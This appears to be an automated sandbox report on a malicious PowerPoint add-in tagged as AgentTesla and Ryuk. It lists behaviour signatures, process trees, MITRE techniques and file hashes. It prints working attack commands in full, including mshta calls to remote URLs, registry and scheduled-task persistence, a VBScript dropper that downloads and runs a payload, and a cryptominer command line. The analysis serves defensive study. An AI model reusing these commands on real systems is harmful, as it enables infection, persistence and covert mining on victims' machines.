oshBJzN0S5fh+DtrSFbUf9t/8FJYyN8Fs2iHykS5MY7RAAmdwC4ht5SUHqkcReROrdL96V7+E3hxSEtd39hiWhyGGkM3QLl/F6P0uKVskm0MvSPEOW7yM+gTeXtEjCvIEVpwjkKJ4b3P+hrAEMZbjI74g1cZZzewCffWqG3tmbZodv7WEVP59XxINnUV402gA9p3E9PlIKNtrn484D6szTvmE/ZbIhtFcmxejswyF8AUvz/irw2Zd0IlJr/zrDOwjK5igC5Hp4ushR0MyBWvqVEPJ5y0PSr9X0kiuyaAr6lQa+7UZK0t/o5T7o0kNqoVoshBJzN0S5fh+DtrSFbl2lSUowtW1cS0rLLP4gYQJEPMWnqhyJW95LtYjgii6ExbWTJ6t/x3JMKMXb+TlqmiWhyGGkM3QLl/F6P0uKVscxmdMnbF+H3Wyck+dcR+C/tcHhHajylOcAoCzDShlnHJdXS4Pmnfp/tOeipNc1oMZ1AolcqctWDIs6YALIDAGwFb2xcuV4fcbJzR63xF5LM4HSGKUqqwxaEHtuCauTji81ZsG+ak+TGD+ZgRBSKvp9XswZFl+DUgrKkA62vHafiNS/hR6A1wimSRpA8I+Q/ft2lcydCEgJHLvyltCqTwuwy56xYgqWbXzIn74O/eimEBv1nGY6Veg2SFdoQW6OO1q6DC6wXyfeyWAmGjYZ3FMrqPIoDfJ/5JbBYaMildXwsq+ggO8l8nnsFgpxIW2dBz/KgJ0uAOY5ZM7t+Wl8aq4w7SUJyfDkYXh/423c31S+sq+ggO8l8nnsFgpxIW2dBzfXn3Zlr24rOwUSVjQjPJ2eZFnKlh8BalFh6RrdcYAzS9ZiLGgvyL36etzadTzQteq6DC6wXyfeyWAmGjYZ3FMnrxORhACEXDYyiy2Nyg1sXMa3AGC72lyrJ8UbCOh1GkjnT+SVN+YgxXU3IRCSK+RpqPIoDfJ/5JbBYaMildXwM2HYKA0yBql20a4UfWhHNfxodDYIsbXKvmwTtJ4EWbQ2zLlCu2ylpAG8DCzYKeJrMqiOdBShtC8ZJWPZcE+76Ge4Nx0nWqQcBIPT4Qiig/kHjaD1ifwUELZegIElh0k1V+/qbpsuje4+3Yh1t+kUPOxodDYIsbXKvmwTtJ4EWbQGj2Nghwudp8aCP1mgTYtBpt3bv6rGV+Onknk0uLV/tjNsJGRp0nLdygfG0qr4Hd5v0eZk6Tej4BddKmRfQzWwK+bT7ai7+0GAMcKNylarAixodDYIsbXKvmwTtJ4EWbQiiM6y0skgXfs5Fmf5qjoQ/W

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4372	4656	mshta.exe	POWERPNT.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3928	804	powershell.exe

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

AgentTesla Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4000-186-0x0000000000437DCE-mapping.dmp	family_agenttesla

Blocklisted process makes network request 27 IoCs

Processes:

mshta.exepowershell.exemshta.exeWScript.exe

flow	pid	process
31	4372	mshta.exe
33	4372	mshta.exe
35	4372	mshta.exe
37	4372	mshta.exe
39	4372	mshta.exe
41	4372	mshta.exe
43	4372	mshta.exe
45	4372	mshta.exe
47	4372	mshta.exe
49	4372	mshta.exe
51	4372	mshta.exe
52	4372	mshta.exe
53	4372	mshta.exe
54	4372	mshta.exe
56	4372	mshta.exe
59	3928	powershell.exe
61	3928	powershell.exe
65	3928	powershell.exe
68	1776	mshta.exe
69	1776	mshta.exe
70	1776	mshta.exe
71	1776	mshta.exe
72	1776	mshta.exe
74	4300	WScript.exe
76	4300	WScript.exe
78	4300	WScript.exe
80	4300	WScript.exe

Drops file in Drivers directory 1 IoCs

Processes:

aspnet_compiler.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts aspnet_compiler.exe
Executes dropped EXE 1 IoCs

Processes:

bin.txt

pid process

576 bin.txt

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	aspnet_compiler.exe

pid	process
576	bin.txt

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4600-219-0x0000000140000000-0x0000000140717000-memory.dmp	upx

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "\"mshta\"\"http://1230948%[email protected]/p/19.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"http://1230948%[email protected]/p/19.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "\"mshta\"\"http://1230948%[email protected]/p/19.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)\|IEX\"\", 0 : window.close\")"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).MSOFFICELO)\|IEX\"\", 0 : window.close\")"	mshta.exe

Drops file in System32 directory 1 IoCs

Processes:

mmc.exe

description ioc process

File opened for modification C:\Windows\system32\taskschd.msc mmc.exe

description	ioc	process
File opened for modification	C:\Windows\system32\taskschd.msc	mmc.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exebin.txt

description	pid	process	target process
PID 3928 set thread context of 4000	3928	powershell.exe	aspnet_compiler.exe
PID 576 set thread context of 4600	576	bin.txt	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2148 4372 WerFault.exe mshta.exe

pid	pid_target	process	target process
2148	4372	WerFault.exe	mshta.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2648 schtasks.exe

pid	process
2648	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4568 taskkill.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings cmd.exe

pid	process
4568	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	cmd.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	WScript.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

4656 POWERPNT.EXE

pid	process
4656	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

powershell.exeWerFault.exeaspnet_compiler.exe

pid	process
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
3928	powershell.exe
3928	powershell.exe
4000	aspnet_compiler.exe
4000	aspnet_compiler.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

mmc.exe

pid process

4152 mmc.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

aspnet_compiler.exe

pid process

4000 aspnet_compiler.exe

pid	process
4152	mmc.exe

pid	process
4000	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetaskkill.exeWerFault.exeaspnet_compiler.exemmc.exe

description	pid	process
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	4568	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3928	powershell.exe
Token: SeSecurityPrivilege	3928	powershell.exe
Token: SeTakeOwnershipPrivilege	3928	powershell.exe
Token: SeLoadDriverPrivilege	3928	powershell.exe
Token: SeSystemProfilePrivilege	3928	powershell.exe
Token: SeSystemtimePrivilege	3928	powershell.exe
Token: SeProfSingleProcessPrivilege	3928	powershell.exe
Token: SeIncBasePriorityPrivilege	3928	powershell.exe
Token: SeCreatePagefilePrivilege	3928	powershell.exe
Token: SeBackupPrivilege	3928	powershell.exe
Token: SeRestorePrivilege	3928	powershell.exe
Token: SeShutdownPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeSystemEnvironmentPrivilege	3928	powershell.exe
Token: SeRemoteShutdownPrivilege	3928	powershell.exe
Token: SeUndockPrivilege	3928	powershell.exe
Token: SeManageVolumePrivilege	3928	powershell.exe
Token: 33	3928	powershell.exe
Token: 34	3928	powershell.exe
Token: 35	3928	powershell.exe
Token: 36	3928	powershell.exe
Token: SeIncreaseQuotaPrivilege	3928	powershell.exe
Token: SeSecurityPrivilege	3928	powershell.exe
Token: SeTakeOwnershipPrivilege	3928	powershell.exe
Token: SeLoadDriverPrivilege	3928	powershell.exe
Token: SeSystemProfilePrivilege	3928	powershell.exe
Token: SeSystemtimePrivilege	3928	powershell.exe
Token: SeProfSingleProcessPrivilege	3928	powershell.exe
Token: SeIncBasePriorityPrivilege	3928	powershell.exe
Token: SeCreatePagefilePrivilege	3928	powershell.exe
Token: SeBackupPrivilege	3928	powershell.exe
Token: SeRestorePrivilege	3928	powershell.exe
Token: SeShutdownPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeSystemEnvironmentPrivilege	3928	powershell.exe
Token: SeRemoteShutdownPrivilege	3928	powershell.exe
Token: SeUndockPrivilege	3928	powershell.exe
Token: SeManageVolumePrivilege	3928	powershell.exe
Token: 33	3928	powershell.exe
Token: 34	3928	powershell.exe
Token: 35	3928	powershell.exe
Token: 36	3928	powershell.exe
Token: SeDebugPrivilege	2148	WerFault.exe
Token: SeDebugPrivilege	4000	aspnet_compiler.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

POWERPNT.EXEmshta.exemmc.exeaspnet_compiler.exe

pid process

4656 POWERPNT.EXE
4656 POWERPNT.EXE
4656 POWERPNT.EXE
4372 mshta.exe
4152 mmc.exe
4152 mmc.exe
4000 aspnet_compiler.exe

pid	process
4656	POWERPNT.EXE
4656	POWERPNT.EXE
4656	POWERPNT.EXE
4372	mshta.exe
4152	mmc.exe
4152	mmc.exe
4000	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.exemshta.exemshta.execmd.exeWScript.exebin.txt

description	pid	process	target process
PID 4656 wrote to memory of 4372	4656	POWERPNT.EXE	mshta.exe
PID 4656 wrote to memory of 4372	4656	POWERPNT.EXE	mshta.exe
PID 4372 wrote to memory of 2648	4372	mshta.exe	schtasks.exe
PID 4372 wrote to memory of 2648	4372	mshta.exe	schtasks.exe
PID 4372 wrote to memory of 4568	4372	mshta.exe	taskkill.exe
PID 4372 wrote to memory of 4568	4372	mshta.exe	taskkill.exe
PID 3928 wrote to memory of 3948	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 3948	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 3948	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 4000	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 4000	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 4000	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 4000	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 4000	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 4000	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 4000	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 4000	3928	powershell.exe	aspnet_compiler.exe
PID 1496 wrote to memory of 1776	1496	mshta.exe	mshta.exe
PID 1496 wrote to memory of 1776	1496	mshta.exe	mshta.exe
PID 1776 wrote to memory of 3120	1776	mshta.exe	cmd.exe
PID 1776 wrote to memory of 3120	1776	mshta.exe	cmd.exe
PID 3120 wrote to memory of 4300	3120	cmd.exe	WScript.exe
PID 3120 wrote to memory of 4300	3120	cmd.exe	WScript.exe
PID 4300 wrote to memory of 576	4300	WScript.exe	bin.txt
PID 4300 wrote to memory of 576	4300	WScript.exe	bin.txt
PID 576 wrote to memory of 4600	576	bin.txt	explorer.exe
PID 576 wrote to memory of 4600	576	bin.txt	explorer.exe
PID 576 wrote to memory of 4600	576	bin.txt	explorer.exe
PID 576 wrote to memory of 4600	576	bin.txt	explorer.exe
PID 576 wrote to memory of 4600	576	bin.txt	explorer.exe
PID 576 wrote to memory of 4600	576	bin.txt	explorer.exe
PID 576 wrote to memory of 4600	576	bin.txt	explorer.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO - CE AUSTRALIA PTY LTD.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4656

C:\Windows\SYSTEM32\mshta.exe
mshta http://www.j.mp/llsoaskokcdokoktewelvw
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4372

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/19.html""\"", 0 : window.close"\")
3⤵
- Creates scheduled task(s)
PID:2648

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4568

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4372 -s 3048
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
#cmd
2⤵
PID:3948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
#cmd
2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4000

C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4152

\??\c:\windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta http://1230948%[email protected]/p/19.html"", 0 : window.close")
1⤵
- Suspicious use of WriteProcessMemory
PID:1496

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://1230948[email protected]/p/19.html
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>lulupupugugugagamotherfucker.vbs &@echo dim stream_obj >>lulupupugugugagamotherfucker.vbs &@echo dim shell_obj >>lulupupugugugagamotherfucker.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>lulupupugugugagamotherfucker.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>lulupupugugugagamotherfucker.vbs &@echo set shell_obj = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>lulupupugugugagamotherfucker.vbs &@echo URL = "https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_39e7aca5ca73408f9ea38510ed3aa48e.txt">>lulupupugugugagamotherfucker.vbs &@echo http_obj.open "GET", URL, False >>lulupupugugugagamotherfucker.vbs &@echo http_obj.send >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.type = 1 >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.open >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.write http_obj.responseBody >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.savetofile "C:\Users\Public\scan.txt", 2 >>lulupupugugugagamotherfucker.vbs &@echo Dim xxx >>lulupupugugugagamotherfucker.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>lulupupugugugagamotherfucker.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\scan.txt", 1) >>lulupupugugugagamotherfucker.vbs &@echo content = file.ReadAll >>lulupupugugugagamotherfucker.vbs &@echo content = StrReverse(content) >>lulupupugugugagamotherfucker.vbs &@echo Dim fso >>lulupupugugugagamotherfucker.vbs &@echo Dim fdsafdsa >>lulupupugugugagamotherfucker.vbs &@echo Dim oNode, fdsaa >>lulupupugugugagamotherfucker.vbs &@echo Const adTypeBinary = 1 >>lulupupugugugagamotherfucker.vbs &@echo Const adSaveCreateOverWrite = 2 >>lulupupugugugagamotherfucker.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>lulupupugugugagamotherfucker.vbs &@echo oNode.dataType = "bin.base64">>lulupupugugugagamotherfucker.vbs &@echo oNode.Text = content >>lulupupugugugagamotherfucker.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Type = adTypeBinary >>lulupupugugugagamotherfucker.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.txt") >>lulupupugugugagamotherfucker.vbs &@echo LocalFile = tempdir >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Open >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>lulupupugugugagamotherfucker.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>lulupupugugugagamotherfucker.vbs &@echo Set fdsafdsa = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>lulupupugugugagamotherfucker.vbs &@echo If (fso.FileExists(LocalFile)) Then >>lulupupugugugagamotherfucker.vbs &@echo fdsafdsa.Exec (LocalFile) >>lulupupugugugagamotherfucker.vbs &@echo End If >>lulupupugugugagamotherfucker.vbs& lulupupugugugagamotherfucker.vbs &dEl lulupupugugugagamotherfucker.vbs
3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3120

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\lulupupugugugagamotherfucker.vbs"
4⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4300

C:\Users\Public\bin.txt
C:\Users\Public\bin.txt
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\explorer.exe
C:\Windows\explorer.exe -B --donate-level=1 -a cryptonight --url=pool.supportxmr.com:5555 -u 8AsWuFbYMBQQFKBWQDAMiqgZnQLSQjB7p6hrYwxdocCvFdgJjYjckDiLGTEzwGRidoTZjnobmuwChgcNawxgur9f7i9fb88 -p x -R --variant=-1 -t 1 --max-cpu-usage=50
6⤵
PID:4600

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_5CCE0F5A48D99B9446BB2EDF09EF208A

MD5
2f8c9e1fff0efd6c541b11dbddd18ec8

SHA1
720de8d5681917f103d77c760dc95a624c81b4d8

SHA256
d2d81953f6f7be7dc040ca8e897994f40a13d54f562c2a3a23654181f57baaa9

SHA512
616dc5ad46163055e0bc6e26908355782a854af3aa53b43a7c35ea1bfdbe014414ee1f68c0f3a4e8c73f93145e7d0ca3b92289c7e1e86b7a8757be18ae50194c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_9E586C9C4EFA6BF55193BA5712A132CE

MD5
5469e80fdc936793fa376002348151a8

SHA1
ad89edeb3e2851e7099e4a2b64b9809ae8d54df2

SHA256
8e74acc5da52c171ad3a5d768c86c49a67fedddbbfcaba0372472256915ddf79

SHA512
3e2c3cc36062d12e3253ed21652210fa4a4a78a4f099499662f258c718cb55b50fef8a98f097cad7c01198c823113c0d798cdb8808743813fa96abc0431ace4c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_DF018E1926302C6B4981E6FB53557FDA

MD5
3d7683aef89fb9cac9eefde8ed002c68

SHA1
2cd7fd52f9878914df215d3a31f7a62c27495c33

SHA256
2c8ff5c9f5342d8194721f2b2a5a489ab644162a450bd2eba0fe7242a1bff37e

SHA512
36ef3c6c580f2b3fbdd11f36a72696e1cfbcb49c22e50887be0ccbdbc60142c7cc89ae526ef841dd0b45f5382941e11840105ea7a7377ab79019f2fe563e2ca2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B

MD5
4f914d6a12b48374677859978d3def97

SHA1
d29a1ff9bc1fbf5c4c0cf3210c9aefe33fc8e5a5

SHA256
eb9ac8c88c0857b9588076073491eec79f4725aa32bc7af00c20ef31095d1d68

SHA512
ab9cc44820d05b5207d1210e189041f3df258346619f05ae1b058de8b358438095a09b0fed26fcf09d7d08caae353f680936ebe24fdc94c18411463d5ecfbe61

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC197601BE0898B7B0FCC91FA15D8A69_5CCE0F5A48D99B9446BB2EDF09EF208A

MD5
d3ad9e312b41af366df0c4d665bf6d7b

SHA1
c1cf397dcd63e1453e8073b8cf988f661c7cabed

SHA256
e5a86df7a101749d8e95047377b7e01e69694bedc258e40da5e2f46cc9272754

SHA512
